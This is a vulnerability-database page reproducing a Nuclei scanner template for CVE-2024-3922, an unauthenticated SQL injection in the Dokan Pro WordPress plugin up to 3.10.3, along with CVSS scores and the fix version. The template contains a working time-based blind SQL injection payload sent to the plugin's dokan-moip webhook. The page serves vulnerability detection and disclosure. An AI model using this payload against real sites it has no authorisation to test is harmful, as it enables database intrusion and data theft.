Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-3922
HistoryJun 15, 2024 - 3:31 p.m.

Dokan Pro <= 3.10.3 - SQL Injection

2024-06-1515:31:49
ProjectDiscovery
github.com
24
dokan pro
sql injection
wordpress
cve-2024-3922
sqli vulnerability

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.3

Confidence

Low

EPSS

0.006

Percentile

78.4%

The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
id: CVE-2024-3922

info:
  name: Dokan Pro <= 3.10.3 - SQL Injection
  author: securityforeveryone
  severity: critical
  description: |
    The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
  impact: |
    Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: |
    Fixed in 3.11.0
  reference:
    - https://dokan.co/docs/wordpress/changelog/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3922
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/dokan-pro/"
  tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - 'Dokan product'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
        Host: {{Hostname}}

        {"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 302'
        condition: and
# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.3

Confidence

Low

EPSS

0.006

Percentile

78.4%